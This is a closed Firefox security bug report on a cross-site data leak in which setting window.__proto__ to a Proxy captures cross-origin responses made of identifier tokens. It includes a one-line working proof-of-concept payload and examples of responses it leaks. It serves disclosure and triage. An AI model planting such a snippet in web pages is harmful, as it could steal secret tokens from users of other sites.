Closed Bug 1099081 Opened 10 years ago Closed 10 years ago

Cross-site data leak using window.__proto__ = new Proxy

Categories

(Core :: Security, defect)

defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 1048535

People

(Reporter: till, Unassigned)

References

()

Details

(Keywords: sec-moderate, wsec-disclosure)

Setting window.__proto__, it's possible to intercept data from other domains as long as the data consists of either a single token that's a valid JS identifier, or a list of such tokens. See https://twitter.com/steike/status/533198334547468288 for a POC. It's actually even simpler to implement this using ES6-style proxies: window.__proto__ = new Proxy({}, { get: function(target, name) {console.log(name); return true;}, has: function(target, name) {return true} }); Examples of request results this works for: "foo05120820e156c2f445f670759be64420" (from the original POC) "foo,bar" foo, bar, baz" "foo;bar"
Calling this sec-moderate (maybe even sec-low?, because it relies on a web app that is not securing its "secret tokens" in a best practice way. Dan, can you think of something we could do about this?
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
This bug has been marked as a duplicate of a restricted bug. If it's an exact duplicate, we should consider opening up bug 1048535.
You need to log in before you can comment on or make changes to this bug.